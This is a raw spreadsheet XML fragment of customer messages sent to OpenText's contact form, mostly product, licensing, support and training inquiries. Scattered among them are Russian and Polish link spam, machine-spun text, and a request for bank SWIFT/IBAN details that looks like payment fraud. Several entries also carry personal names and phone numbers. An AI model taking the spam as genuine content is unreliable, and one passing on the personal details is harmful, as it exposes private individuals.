Date: 2/7/2018 9:26:53 AM_x000D_
To: cmadvocate@xo.com_x000D_
Subject: RE: CSR Request: Customer Betsy &amp; Adam [#9327725]_x000D_
Or just try entering Betsy and see what results come up…._x000D_
 _x000D_
From: Trupti Vaidya _x000D_
Sent: Wednesday, February 07, 2018 10:24 AM_x000D_
To: 'cmadvocate@xo.com' &lt;cmadvocate@xo.com&gt;_x000D_
Subject: RE: CSR Request: Customer Betsy &amp; Adam [#9327725]_x000D_
 _x000D_
Is it even close to that name?  Did you try just Betsy &amp; Adam or just Betsy and Adam?  _x000D_
 _x000D_
From: cmadvocate@xo.com [mailto:cmadvocate@xo.com] _x000D_
Sent: Wednesday, February 07, 2018 10:14 AM_x000D_
To: Trupti Vaidya &lt;Trupti.Vaidya@AlticeUSA.com&gt;_x000D_
Subject: RE: CSR Request: Customer Betsy &amp; Adam [#9327725]_x000D_
 _x000D_
The customer account name is not pulling as "Betsy &amp; Adam, Ltd."_x000D_
_x000D_
--Original Message--_x000D_
From: Trupti.Vaidya@AlticeUSA.com_x000D_
Date: 2/6/2018 5:49:22 PM_x000D_
To: cmadvocate@xo.com_x000D_
Subject: RE: CSR Request: Customer Betsy &amp; Adam [#9327725]_x000D_
Try this:   _x000D_
 _x000D_
Betsy &amp; Adam, Ltd._x000D_
1400 BROADWAY_x000D_
NEW YORK, NY 10018_x000D_
United States_x000D_
 _x000D_
From: cmadvocate@xo.com [mailto:cmadvocate@xo.com] _x000D_
Sent: Tuesday, February 06, 2018 5:25 PM_x000D_
To: Trupti Vaidya &lt;Trupti.Vaidya@AlticeUSA.com&gt;_x000D_
Subject: Re: CSR Request: Customer Betsy &amp; Adam [#9327725]_x000D_
 _x000D_
The customer accoun</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I have some questions about training courses I must do,_x000D_
in order to be up-to-date in the market._x000D_
_x000D_
I have been working many years with Actuate, then the products I used_x000D_
are:_x000D_
 - Actuate ErdPro ( report development, client side )_x000D_
- Different Portals for reports administration_x000D_
_x000D_
... are those report tolls stil in use by OprnText, or not ?_x000D_
if not, which tools I need to learn ? I thought to the Analytics products,_x000D_
therefore:_x000D_
_x000D_
- OpenText Big Data Analytics_x000D_
- OpenText Information Hub_x000D_
- OpenText Information Server Suite_x000D_
_x000D_
... am I correct ?_x000D_
_x000D_
I also heard about Magellan ... in this case I don't see aby training available_x000D_
_x000D_
I look forward your indications,_x000D_
kind regards_x000D_
_x000D_
Andrea Goldoni</t>
  </si>
  <si>
    <t>We are starting to investigate DAM systems and would like to talk with you to get more information. Can we set up a meeting time for you to come here?</t>
  </si>
  <si>
    <t>We have been using ApplicationXtender for about 8 years now. I need to move it to new hardware and get an upgrade done at same time. Our vendor is giving me a run around, so I am asking you to recommend a vendor who holds a state contract in New Jersey for AX, so I can contact them for this service. Any questions feel free to call me.</t>
  </si>
  <si>
    <t>Pricing and Features request</t>
  </si>
  <si>
    <t>Trying to send an RFP out today and one of our staff wanted OpenText in the vendor list.  Unfortunately, I am unable to find a way to contact you by email.  I've tried calling but with no immediate success.  If you could provide me an email address for sales in the next few hours, I will gladly include you for consideration.  Thank you.  -Cary</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
aktuell evaluieren wir in unserem Unternehmen verschiedene Dokumentenmanagement Systeme. Dabei sind wir auf Ihre Software aufmerksam geworden. Um Sie über unser standardisiertes Kontaktverfahren für potentielle Lieferanten zu kontaktieren benötige ich eine Email-Kontaktadresse. Können Sie mir bitte eine Email-Adresse eines Deutschsprachigen Sales-Verantwortlichen zukommen lassen?_x000D_
Mit freundlichen Grüssen, _x000D_
Heidi Adams_x000D_
</t>
  </si>
  <si>
    <t>The US AF program that we are the O&amp;M Contractor for would like to see if Exceed v15 will meet our need to connect to Solaris and Linux servers.  I would like a demo copy to test.</t>
  </si>
  <si>
    <t xml:space="preserve">Training OpenText Exstream </t>
  </si>
  <si>
    <t>im wondering if i could get any information you may have regarding creation of packages for SCCM.   I'm looking to create packages for enterprise scan and capture center.  i have the MSI files  but im looking to only install the validation client for cc not the entire set.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Support team,_x000D_
_x000D_
Can you look into this connection? Partner is sending a test 850 but we are not getting it. Does the connection look correct?_x000D_
_x000D_
Damvia/Fosdick_x000D_
ZZ DAMIVA_x000D_
_x000D_
Partner ID_x000D_
08 925141CORP_x000D_
_x000D_
Sample info from partner _x000D_
_x000D_
ISA*00*          *00*          *08*925141CORP     *ZZ*DAMIVA         *180206*0945*U*00401*000000001*0*P*&gt;_x000D_
GS*PO*6128284044*DAMIVA*20180206*0945*1*X*004010                                                         _x000D_
ST*850*1001                                                                                              _x000D_
BEG*00*SA*44618120**20180206                                                                             _x000D_
PER*BD*MICHELLE PETERSON*TE*9522947134                                                                   _x000D_
FOB*PP*OR*FAX 437-800-3999                                                                               _x000D_
DTM*002*20180808                                                                                         _x000D_
TD5****M                                                                                                 _x000D_
N9*L1**GENERAL MESSAGES                                                                                  _x000D_
MSG*TEST PO DO NOT SHIP                                                                                  _x000D_
MSG*CONFIRM APPTMNT 48HRS IN ADVANCE AT SVHARBOR.COM_x000D_
MSG*OTHER INQUIRIES 804 746 6717.  BY ACCEPTING THIS_x000D_
MSG*PO OR SHIPPING ANY GOODS FOR PO VENDOR AGREES   _x000D_
MSG*TO BE BOUND BY TERMS CONDITIONS AT SVHARBOR.COM _x000D_
N1*BS*SUPERVALU - MECHANICSVILLE*9*007941263RF01    _x000D_
N3*8258 RICHFOOD ROAD                               _x000D_
N4*MECHANICSVILLE*VA*23116                          _x000D_
N1*VN*DAMIVA INC*9*2030863270000                    _x000D_
PO1**1*CA*432*FX*UA*062805569715*PI*8940598         _x000D_
PID*F****DAMIVA     CLEO LABIAL MOISTR              _x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>I need to setup an account to get service on an issues I am having in GXS trading grid</t>
  </si>
  <si>
    <t>МОСКВА, 4 февраля. /ТАСС/. Мэр Москвы Сергей Собянин сообщил об одном погибшем в результате сильного снегопада в столице. Как сообщил мэр города на своей странице в "ВКонтакте", причиной стало падение дерева и порыв линии электропередачи, подробнее об этом читайте на сайте [url=http://hayastannews.com]hayastannews.com[/url]</t>
  </si>
  <si>
    <t>Hi,_x000D_
I need access to Knowledge Center. The Siemens Contract number  0073032822._x000D_
Could you please guide me how can I get the access._x000D_
_x000D_
Regards,_x000D_
Subir</t>
  </si>
  <si>
    <t>I already have RightFax, but I need to purchase more FoIP licenses for my fax gateway.  I purchased RightFax from Ricoh, but they're making it next ti impossible to purchase more FoIP channels.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
RFQ - Upgrade RightFax enterprise fax manager to last version (Quantity=1)  _x000D_
Upgrade Right Fax-Fax Server, RightFax Enterprise Edition, Providing the required LIcense and ensuring that it is functioning properly. Connect with our Exchange Server and provide any Support needed._x000D_
_x000D_
Best Regards,_x000D_
Mir Faiz Ali</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are looking for a software that can record the screen activity and need to make some screen videos. Pls send quote for these requirements or Opentext imaging viewer 10.5</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Zuge einer Migration von SAP ERP auf S/4 HANA sind wir auf der Suche nach einem SAP-Add-on, welches bei uns das Thema „Rechnungseingang“ in S/4 HANA komplett abdecken würde._x000D_
Wichtig ist dabei, dass das Produkt S/4 HANA-fähig (zertifiziert) und 100%-Fiori-fähig wäre. _x000D_
Erfüllt Ihr Produkt Vendor Invoice Management diese Voraussetzung?_x000D_
Wenn ja, könnten Sie uns bitte weitere detailierte Informationen zu diesem Produkt zur Verfügug stellen? Am liebsten als eine Websessionpräsentation inkl. Q&amp;A – dazu würden wir auch unseren Fachbereich einladen. _x000D_
Ich schlage vor, sich zuerst über unsere Produktanforderungen kurz telefonisch auszutauschen (Funktionsumfang, Datenvolume, Projektzeitleiste/-hintergründe), bevor wir eine Webpräsentation einplanen._x000D_
_x000D_
Wir freuen uns auf Ihre Rückmeldung._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Emanuel Chan_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
our Company is interessted in having a SOCKS Client v14  Quote from you. Are the licenses user licenses or Server licenses? We need 30 licenses, is there a Discount for the amount of licenses? _x000D_
Thank you and best regards_x000D_
Carolin Schneid _x000D_
Bertrandt AG</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, are you looking for prospects list for your marketing campaign?  We have 6,418  Citrix XenDesktop Customers from  Europe._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com_x000D_
</t>
  </si>
  <si>
    <t>Want more clients and customers? We will help them find you by putting you on the 1st page of Google. Email us back to get a full proposal.</t>
  </si>
  <si>
    <t>Im trying to install a licence key Obtaining your License Key:_x000D_
•             Please visit: support.opentext.com and follow the below steps_x000D_
o              Click on Accounts on the Top Menu_x000D_
o              Select Activations/Keys_x000D_
o              On the Product Activation Page Search for your IGC PIN_x000D_
o              Click on the Produce License Key icon_x000D_
o              Enter Required information to generate Key_x000D_
o              Click Submit_x000D_
o              Click Download File to obtain your License File_x000D_
o              Open zip file and save IGCKey.lic to a retrievable location (i.e. Desktop)._x000D_
 _x000D_
these are the steps that you sent to me and they dont work i have logged into support.opentext.com and then there is no option to click on Accounts on the top menu</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are currently using interwoven TeamSite 6.7.2 Service Pack 2 for our webisite. We are looking to update the backend CMS and would like to know if this is possible now that the owner has changed to opentext. We would also like to update the design of the site and would like to see if you provide this service. Alternativley do you have any partners you can recommend who can do website design using the OpenText CMS?_x000D_
_x000D_
Best regards,_x000D_
John.</t>
  </si>
  <si>
    <t>I would like to learn more about OpenText™ Extended ECM for Microsoft® SharePoint</t>
  </si>
  <si>
    <t>We want information on local partner for evaluation and purchase of Document Management System.</t>
  </si>
  <si>
    <t>Re: Innovation Tour Sydney March 1, 2018, is there a cost for this conference?</t>
  </si>
  <si>
    <t>Need trial version for testing before purchase. Please also provide proforma invoice..</t>
  </si>
  <si>
    <t>Can't log a support ticket via My Support</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sorry for off-topic, I am considering about creating an enlightening site for kids. Will probably start with posting interesting facts like"The Beetham Tower has 47 floors."Please let me know if  you know where I can find some related info like right here_x000D_
 _x000D_
http://wp-kenyukai-na-01.appspot.com/category/essays-for-sale/_x000D_
</t>
  </si>
  <si>
    <t>В Москве снять номер на час, отель снять на час на ночь на двоих, снять отель с сауной http://nomer-na-chas.stohotels.ru/  8-962-959-21-59</t>
  </si>
  <si>
    <t xml:space="preserve">Tried to open a 15 day trial version so i could open a file sent to me by an architech and the down load failed and said to contact you. </t>
  </si>
  <si>
    <t xml:space="preserve">Information on project </t>
  </si>
  <si>
    <t>Suncor has Documentum 5.3, 6.5 and 6.7 across various sites. There is a project underway to upgrade to a standardized level 7.2 or 7.3. As solution architect, I require documentation that explains the Documentum product architecture and also documentation that will provide me with information that explains any changes in features or architecture between these older products and version 7.2 or 7.3._x000D_
_x000D_
Please provide me with access to the Documentum knowledgebase so I can search it for the above-described information. Alternatively, you can simply send me the documents I need._x000D_
_x000D_
Please respond ASAP</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
My name is Rossel. I am with Neeyamo Inc. We provide support to third party consumer reporting agencies worldwide. I am writing to understand what would be the procedure for verifying employment records for an employee._x000D_
 _x000D_
We just need to verify dates of employment, job title._x000D_
 _x000D_
We would highly appreciate if you could please provide us with the contact details for the appropriate person who can assist us with the verification for  TIMOTHY MORA._x000D_
_x000D_
The reference number for this request is 438737532._x000D_
 _x000D_
We appreciate your assistance._x000D_
 _x000D_
Thank you!_x000D_
Best Regards,_x000D_
 _x000D_
Rossel V._x000D_
_x000D_
Verification Support Team_x000D_
_x000D_
Neeyamo Inc- HR :: Consulting | Technology | Operations_x000D_
Address: 14317 La Rinconada Drive,_x000D_
Los Gatos, CA 95032_x000D_
Phone: +1- 408-214-3434_x000D_
Fax: +1-888-689-2471_x000D_
Email: adp.verificationsupport@neeyamo.com | Web: www.neeyamo.com</t>
  </si>
  <si>
    <t>Ферма в селе Долгинино, Рязанской области. [url=https://xn--80aieocueqr8g.xn--p1ai]новостройки мытищи[/url] сдать или арендовать недвижимость в мытищах через агентство недвижимости 3 ступени. [url=https://xn--80aieocueqr8g.xn--p1ai]жк отрадное застройщика[/url]</t>
  </si>
  <si>
    <t>The Singer Group needs a quote for a new EDI Solution. Our current EDI provider utilizes a csv flatfile upload/download model that is increasing the company's labor costs. Also, it is not doing a great job helping the company expand in sales.</t>
  </si>
  <si>
    <t>I own a software company and we are performing integration and ecommerce work on behalf of a client in the sports apparel industry.  One of our suppliers asked if we had an account # through OpenText. (GXS)  We would like to understand if this is something we should have and if would ease the integration of suppliers into the system we are building.  Please call me during West Coast business hours.</t>
  </si>
  <si>
    <t>Мы предоставляем в нашем салоне эстетики кабинеты для знатоков по косметологии. У нас все оборудование недавно купленное, кабинеты с после ремонта. В территориальной близости от рабочих офисов. Новоявленный ремонт, перепроектировка под ваши собственные необходимости! Сотворены все нужные условия для спокойного заезда автомобилей. Все кабинеты   разработаны на 3-4 многофункциональных зон для людей разных специальностей, которые обязательно будут у нас работать. Это совсем новый бизнес-проект, рассчитанный материализовать все необходимости художников. Мы с вами делаем все для нерушимого комфортабильности в работе, и уделяем довольно много внимания деталям. _x000D_
 _x000D_
Академия гель-лака - [url=https://mzezina.ru/]ногтевой сервис цена[/url]</t>
  </si>
  <si>
    <t>We would like to proceed ASAP with a WebEx presentation of EnCase Enterprise and soon after that with a on site visit to discuss your proposal for Enterprise Forensics options for Bank of Montreal._x000D_
We would appreciate if you can send us in advance any questions that will make the solution more suitable to our needs.</t>
  </si>
  <si>
    <t>We are looking for a document and content collaboration product, we have list of questions that need to answered so that we can evaluate accordingly..</t>
  </si>
  <si>
    <t>Regarding EDI testing with Nordstrom - our testing was completed in 2014 and we need to know if it is still valid. Please let me know by emailing me back. Thank you!</t>
  </si>
  <si>
    <t>update</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to setup a demo with our DMS review committee in the next couple of weeks. </t>
  </si>
  <si>
    <t>I filled out the form to receive the latest free download of Brava reader but never got the email link. Can someone resend me the link so I may download it?</t>
  </si>
  <si>
    <t>What are the sponsorship opportunities for Innovation 2018 in London?  What tiers?</t>
  </si>
  <si>
    <t>Bonjour _x000D_
_x000D_
Je recherche des intégrateurs d'OpenText pour SAP en France. Avez-vous une liste de ces sociétés de services partenaires priviligiés d'Open Text / SAP._x000D_
_x000D_
Merci</t>
  </si>
  <si>
    <t>Understand more about opentext and its customization capabilities, and costing for licenses for enterprise level clients</t>
  </si>
  <si>
    <t>Hello,_x000D_
Our records show that our support with Open Text is due at the end of February, can you send me a quote for what it will cost to renew our existing support for another year?_x000D_
_x000D_
Thank You,_x000D_
Adam Schaefer</t>
  </si>
  <si>
    <t>Interested in DMS system. Please, send me a quote (our company is sized to 18 people).</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a QMS software for management of documents, audits, training etc.,_x000D_
I have used Livelink software in my previous organization for documents and validation records management. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I hope this finds you well. _x000D_
_x000D_
I was curious about the event. Now I am curious as to why there is only one (please correct/ forgive me if I'm wrong) lady on the speaker list. _x000D_
_x000D_
I write because I work in the tech industry, I trust that things will change and I think it's important that people speak up. I shan't be coming to the event, I often go to/ speak at conferences, however, I have been to far too many tech events where I have been asked for cups of tea/ if I'm as assistant, it has become apparent that such encounters are more frequent at events where women are underrepresented. _x000D_
_x000D_
There is no need to reply to this note.  _x000D_
_x000D_
Kindest wishes,_x000D_
_x000D_
Jane</t>
  </si>
  <si>
    <t>Evaluating different BI solutions for a client.  I'm going to download the free trial of iHub for testing, but I'm wondering about the pricing model.  Thanks.</t>
  </si>
  <si>
    <t>Dear Sir/ Madam,_x000D_
_x000D_
My name is Lina and I am a Consultant from Oliver Wyman, a global Management Consulting firm. Our client is a leading SEA communications service provider undergoing a large-scale IT transformation, and is looking to engage with vendors to help establish the associated system requirements. The focus of our exercise is on the functionality currently served by the BSS systems (e.g., OSS / ESS largely out of scope, as is network-oriented tools)._x000D_
_x000D_
We have identified your company as one of the potential vendors that can help our client with one or more technology platforms that our client is contemplating will comprise the future IT architecture. Shortly, we will be issuing an RFI to all potential vendors; if you are interested in participating in the RFI process, please provide us with the following details of the 1) key account manager and an 2) alternative point of contact with whom we should liaise with:_x000D_
•	Name_x000D_
•	Email address_x000D_
•	Contact number _x000D_
We envision vendors who engage in this process will have a concrete advantage during the formal RFP process, which will follow soon after the RFI is complete. _x000D_
_x000D_
We expect to issue the formal RFPs by 14/Feb, so if you would like to involved, please reply before this date. We look forward to hearing back from you with the contact details of whom we should be reaching out to. Please do not hesitate to let me know if you have any further queries._x000D_
_x000D_
Best Regards,_x000D_
Lina</t>
  </si>
  <si>
    <t>Tempe Union HSD uses Open Text. We currently are using server 2008 and need to convert to server 2012. We need to talk to support about doing this. I recently started at the district and don't have any contacts at Open Text for our account. I need to know if our account is up to date and if it is see what needs to be done in order to get support for this server migration.</t>
  </si>
  <si>
    <t>We require information and/or a demo of the Capture Center software. We are looking for software that will recognize documents (e.g. bank statements, invoices etc) and extract the necessary information into a csv or xlsx.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
The purpose of this email is to officially invite you as a speaker for the "10th Euro-Global Conference on Infectious Diseases” which is going to be held on September 27-29, 2018, at Rome, Italy.	   _x000D_
The theme of the conference is “Advancing in science and improving care to prevent the Infectious Diseases"	   _x000D_
Euro Infectious Diseases 2018 conference is a major forum for Virologists, Microbiologists, Bacteriologists, Neurologist, Ophthalmologists, Cardiologists, Public Health Professionals, Immunologists and Epidemiologists. The main theme of this conference covers a wide range of important sessions from basic research to innovations in the area of Infectious Diseases.	   _x000D_
For more details about the conference please visit:  https://goo.gl/WkVqGf	   _x000D_
Benefits:	   _x000D_
Keynote sessions by world’s most eminent researchers and Networking with Experts in the stream of Infectious Diseases._x000D_
• E-Poster for $99_x000D_
• Outstanding Young Researcher Award and Best Poster Award_x000D_
• Top Industries Representation	   _x000D_
Conference Highlights:	   _x000D_
Viral Infectious Diseases, Bacterial Infectious Diseases, and Fungal Infectious Diseases._x000D_
Dermatological Infectious Diseases, Neurological Infectious Diseases, Parasitic Diseases._x000D_
STD And HIV infections, Ophthalmological Infectious Diseases, Public health practice._x000D_
Vaccines, Respiratory Diseases, Veterinary Infectious Diseases	   _x000D_
	   _x000D_
We hope to see you at Rome, Italy.	 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Conducting a BPM vendor evaluation for a manufacturing customer and interested in learning more about OpenText in order to determine if your product should be included in teh evaluation.</t>
  </si>
  <si>
    <t>Inquiring about license purchasing - after initial license purchase of Brava! Desktop CXL-N licenses, is maintenance all that is required to be renewed after the first year?</t>
  </si>
  <si>
    <t>We are working on DAM Solution and looking to expolre the PixTools SDK (OpenText) to scan documents from different scanners for our clients.</t>
  </si>
  <si>
    <t>Каждый подросток задает себе вопрос о том, что нужно сделать, чтобы пройти тест ЕГЭ на высокие балы. Считается, что самый высокий балл 100. Но все же система российского образования все таки отдает предпочтение тестовой системе, поэтому смело можно говорить о том, что такой тест это своеродная лотерея. Читайте об этом подробнее на сайте [url=https://astrakhan.net]astrakhan.net[/url]</t>
  </si>
  <si>
    <t>We are planning to implement SQl base 12.Would Like to know more about SQLBase 12.2 so Could you please send me the Database Administrators Guide for the same, so that we would get better understanding before we plan to  implement.</t>
  </si>
  <si>
    <t xml:space="preserve">Кто хочет отдать(продать) лекарства после терапии вам сюда!  _x000D_
 _x000D_
&lt;a href=https://www.hcv-forum.ru/viewtopic.php/novosti-issledovaniy-i-razrabotok-v-mire-f27/vosevi-ot-gilead-i-maviret-ot-abbvie-poluchaut-polojitelnoe-zakluchenie-chmp-t798.html?f=27&amp;start=&amp;t=798&gt;voxilaprevir цена&lt;/a&gt;_x000D_
 _x000D_
[url=https://hcv-forum.ru/page/index.php?post=--hepcinat-lp-natco]hepcinat lp[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
CCP Software provides Software Asset Management services for customers belonging to different branches of industry. In the context of those services, we analyze installation data coming from software discovery systems to report software consumption. Moreover, we create different procurement catalogs containing original software manufacturer SKUs. If possible, we would like to enhance those catalogs with your products._x000D_
In order to fulfill this goal, we have several questions regarding the licensing of your products._x000D_
1. What are the editions (e.g. Standard, Professional etc.), if available, in which product Open Text Exceed is available?_x000D_
2. How is the license consumption of product Open Text Exceed counted (e.g. per User, Device, Named User etc.)?_x000D_
3. Does the purchased license apply to several languages (e.g. multi language license) or does one need to purchase a separate license for each language? Which are the languages in which the software product is available?_x000D_
4. Regarding the platform (operating system), may one use the purchased license on several platforms (e.g. Win, Mac, Linux etc.) or does one need to purchase a separate license for each platform?_x000D_
5. Could you provide us with the ECC-number (Export Control Classification Number) to your products?_x000D_
6. Do you use SKUs (Stock Keeping Unit) for your software products? If so, are those SKUs the same worldwide (Is the SKU the same for a customer from the US and Germany?)?_x000D_
7. Could you provide us with a list of SKUs of your software products?_x000D_
8. Could you provide some sort of official licensing information (EULA, License Agreement, Whitepaper etc.) for your software products?_x000D_
_x000D_
Thank you very much for your feedback and cooperation. If you have any questions, feel free to contact us._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
_x000D_
In order to update our database of suppliers, I am looking for the correct details of your company:_x000D_
Correct address_x000D_
SWIFT and IBAN for your EUR account number._x000D_
_x000D_
Unfortunately I don’t have access to see our client number or an invoice._x000D_
_x000D_
Thank you very much for your help._x000D_
Please send the confirmation to lynn.carnoy@comparx.be _x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Endrit Buzaki_x000D_
Reception_x000D_
</t>
  </si>
  <si>
    <t>Hi _x000D_
_x000D_
Could you please let me know if this product is available on AWS and what are the options available if we wanted to migrate IBM EDMS to Open Text._x000D_
Do Open Text have all the features available with IBM EDMS ECM_x000D_
_x000D_
Regards_x000D_
Sajid_x000D_
00973 36362203</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
I am looking for Open Text Content Server Administration V16 course ._x000D_
Please let me know whether you have the course available , if so , please provide me the details ._x000D_
_x000D_
Thanks&amp;Regards,_x000D_
Baiju _x000D_
</t>
  </si>
  <si>
    <t>I'm interested in learning more about your Web Management System.</t>
  </si>
  <si>
    <t>We are into Recruiting and staffing in Hyderabad. we can provide fresher and experienced resource according to your criteria.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, are you looking for prospects list for your marketing campaign?  We have 4,123  OpenText Customers from  Europe._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com_x000D_
</t>
  </si>
  <si>
    <t>I haven't receive any mail that list software installation</t>
  </si>
  <si>
    <t>SLAM. I AM ABDULREHMAN FROM PAKISTAN. DEAR SIR I HAVE A QUESTION TO "OPEN TEXT" THAT IS THERE HAVE OPTION TO DO BUSINESS IN SOFTWARE ON GLOBAL BASE IF A PERSON WANT TO SELL OR RENT HIS PROJECT IDEA TO YOUR COMPANY. CORPORATION IN SOFTWARE SECTOR IN TEXT DATA SAVING JUST IN SMALL SIZE SAVING GLOBAL DATA IN ONE SYSTEM AND IN ONE PLACE.? PLEASE REPLY ME I AM WAITING. REGARDS._x000D_
_x000D_
ABDULREHMAN_x000D_
ABDULRAHMAN4949@GMAIL.COM</t>
  </si>
  <si>
    <t>Z artykułów zdrowia jednakże w środku owo zaradzi migiem się przesuwać pomiędzy konkurentami, D.Va siedzi w ogromnym mechu urządzonym w silniki potrafiące błyskawicznie przebyć nieco kwintali, i w razie zejścia kompletnego pancerza ewakuuje się z robota, tak aby z wykorzystaniem kilkadziesiąt sekund czekać na alternatywa wezwania stopniowego... Szykiem nadrabia atoli niecałkowite niedostatki które wolno zaniechać „prozaicznej drużynowej strzelaninie”. W Uncharted 4 stosunki pośrodku kreacjami są niezmiernie ważne.Ziomki obok stole. Bogactwo kołem się leje zaś w szeregu przypadków za pośrednictwem nieobecność przysłowiowego fryca sczeźniesz krajowy dopieszczony mężny. W wszelkiej z tych grup istnieje po kilku championów silnie różniących się od siebie wizerunkiem tudzież ileś mniej biegłościami. Niesłychanie ciężko rozstać się spośród ulubionymi rozrywkami azali kreacjami zaś notorycznie chcemy, tak aby następujący części dawny zdradzane w bezgraniczność. Dwaj pierwsze napady są całkiem dojmujące, zaś odbiera się w ciągu nie jednokrotnego premii. Przy [url=http://www.recenzjegier.xyz/alan-wake/]windows media player[/url] _x000D_
 _x000D_
potyczki jest dozwolone dopiąć celu masa zadań wspomagających, na które gracz natyka się niemalże wzdłuż i wszerz. Absencja równowadze uczuciowej być może sprawić do masochistycznych skłonności oraz wyrządzania sobie ukłuć, azali nawet zawału serduszka. W gruncie rzeczy – utrzymać się przy życiu, ponieważ czwartą część awantur Nathana Drake’tudzież bardziej się przeżywa niż wręcz przeciwnie w nią rozrywka.Na te zbawienia konstruuje się przede każdym niezwykłe zdarzenie przedstawiona przez Pieseczki. The Division wcale zwykle agregowałoby aż do tej pory liczebność wyzwań. Do wszystkiej gromady</t>
  </si>
  <si>
    <t>One of my clients is interested in your product.  Mostly the Outlook module that enables saving emails to client files easily.  It has to be noted that I have used your product in the past in other law firms and my client is much smaller than other law firms that I have deployed your product at. My client has 10 users so I was wondering if it is in fact possible to get only the Outlook module and what the cost would be._x000D_
Thank you_x000D_
Jeanne Cote</t>
  </si>
  <si>
    <t>Hi, I'm the CEO of DocketBird. We're a quickly growing service that enables lawyers to easily retrieve and access Federal Court documents. Recently some of our users have requested us to integrate DocketBird with OpenText, using OpenText's API. I think this could be mutually beneficial for both our companies. Could you please contact me about this? Thank you!</t>
  </si>
  <si>
    <t>Fax server, RightFax, Fax2email pricing for 50 lines.</t>
  </si>
  <si>
    <t>We need to add our new company prefix to the GXS Catalogue (889662), please advise so I can send the GS1 certificate.</t>
  </si>
  <si>
    <t>We are looking for a solution that can take in various customer inputs (spreadsheets, docs, etc.) and parse them for data to populate a more standard form we can use in our systems (spreadsheet).</t>
  </si>
  <si>
    <t>Requesting a demo and explanation of software package options</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My team and I have been engaged by an oil and gas major to help them select a platform for data analysis around NLP specifically. OpenText InfoFusion is a candidate and I would like to find out more about the platform and potentially set up a demo._x000D_
_x000D_
Please contact me today 2/5 or tomorrow 2/6 to discuss._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Nick Lawrence</t>
  </si>
  <si>
    <t>Looking for information and pricing for the Captiva Cloud Toolkit</t>
  </si>
  <si>
    <t xml:space="preserve">Need Access to download version: Open Text Host Explorer - Version 15 SP3, Open Text Secure Shell   -  Version 15 SP3, Open Text NFS Solo  -  Version  14.0.6 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> УЛИЧНЫЕ шведские стенки купить в   Турникнастенный3 в 1. + Шведские стенки. ДСК Детские спортивные окмплексы.  /categoryh/ulichnye-schvedskie-stenki/ &lt;br&gt; &lt;i&gt;Шведскаястенкадля детей,купитьшведскую  &lt;/i&gt;.&lt;br&gt;  _x000D_
 [URL=http://sports-sites.ml/derevyannaya-shvedskaya-stenka-kampfer-helena-wall-kupit/]Деревянная шведская стенка kampfer helena wall купить[/URL] [URL=http://sport-online-ru.cf/detskij-sportivnyj-kompleks-dlya-doma-v-ekaterinburge/]Детский спортивный комплекс для дома в екатеринбурге[/URL]  _x000D_
 Инструкцияпосборкешведской стенки Ясень   Стенки - perfectteam&lt;/strong&gt;.&lt;br&gt; &lt;i&gt;Дскатлетв Екатеринбурге. Сравнить цены и  &lt;/i&gt;.&lt;br&gt;  _x000D_
шведская стенка в спортмастере цена _x000D_
 _x000D_
 &lt;h2&gt;Шведская стенкаЭктаPro 3: продажа, цена вМинксой области  стенкаЭктаPro 5.   шведская стенкаэкта - про3б усиленная в Минске  производятся в Белоруссии, ориентированы на наиболее  стенкаЭктаPro 5: продажа, цена в Москве  ск-5 Категория:ШведскиестенкиОставить ... Спортивный комплекс «   стенкаЭКТА - ПРО3Б усиленная это ... маты &gt;ШведскиестенкиЭКТА -  PRO, ELIT от компании   стенкаЭктаPro 3.  всей ... толщинастенки2  Шведская стенкаЭКТАPRO 3 в Кобрине, цена на Шведская  взрослых и детейКЭТАкаталог Спортивный комплексЭКТА(шведская  в Интернет-магазине  на товары и услуги  - ПРО.&lt;br&gt; &lt;h3&gt;КупиьтстенкувСевастополе &lt;/h3&gt;.&lt;br&gt;  _x000D_
  [URL=http://shved-stenki.ru/shvedskaya-stenka-st/]Шведская стенка ст[/URL] [URL=http://ru-sport.ga/gde-prodayut-shvedskie-stenki/]Где продают шведские стенки[/URL]  _x000D_
 Шведскаястенка'Чемпион' ТМ   мСотретьвидеоШведскаястенка"Чемпион" ТМ Уют-СпортВидеообзор онлайн, скачать на мобильный. 13, 578.  /video/NlhlXEp7UQI More  -  Вирдеосёрфинг &lt;/u&gt;.&lt;br&gt; &lt;u&gt;Гимнастические снаряды и спортивные комплексы — купить  &lt;/u&gt;.&lt;br&gt;  _x000D_
где купить шведскую стенку в луганске лнр _x000D_
 _x000D_
